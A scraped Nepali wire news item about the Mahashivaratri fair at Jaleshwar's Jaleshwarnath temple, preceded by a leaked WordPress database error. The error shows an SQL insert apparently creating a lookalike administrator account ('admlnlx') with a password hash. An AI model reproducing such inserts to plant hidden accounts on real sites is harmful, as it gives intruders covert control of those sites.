WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKRdKzN4l6BpPwr8LnogxJnulprQb0.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 03:05:29', '', 'admlnlx', 'admlnlx')
गौशाला,फागुन ३ –
महोत्तरी जिल्लाको सदरमुकाम जलेश्वरमा अवस्थित प्रसिद्ध बाबा जलेश्वरनाथ मन्दिरमा प्रत्येक वर्ष महाशिवरात्रिमा लाग्ने विशेष मेलाका लागि यसपालि बाह्र ज्योतिर्लिङ्गको निर्माण गरिएको छ ।
श्रद्धालुले शिवका बाह्रवटै ज्योतिर्लिङ्गको दर्शन गर्न पाउने भएको महाशिवरात्रि पूजनोत्सव समितिका संयोजक अमरदीप साहले बताउनुभयो । भारतबाट विशेष आएका कलाकारले निक्कै कलात्मक ढङ्गले आकर्षक एवम् भव्य ज्योतिर्लिङ्ग बनाएका छन् ।
जलेश्वरनाथ महादेव स्वनिर्मित तथा बाहै्र महिना पानीमुनि बास गर्ने महादेव हुन् । जलेश्वरनाथ महादेव गुफाभित्र बास गर्ने र गुफा पनि स्वनिर्मित नै रहेको पुजारी उपेन्द्र पाठकले बताउनुभयो ।
जलेश्वरनाथ महादेवको दर्शनका लागि महाशिवरात्रि मेलामा नेपालका महोत्तरी, धनुषा, सिन्धुली, सिरहा, सप्तरी, सर्लाही, रौतहट तथा भारतका मधुवनी, सीतामढी, दरभङ्गा र मुज्जफरपुरसम्मका श्रद्धालु आउने गर्छन् । – रासस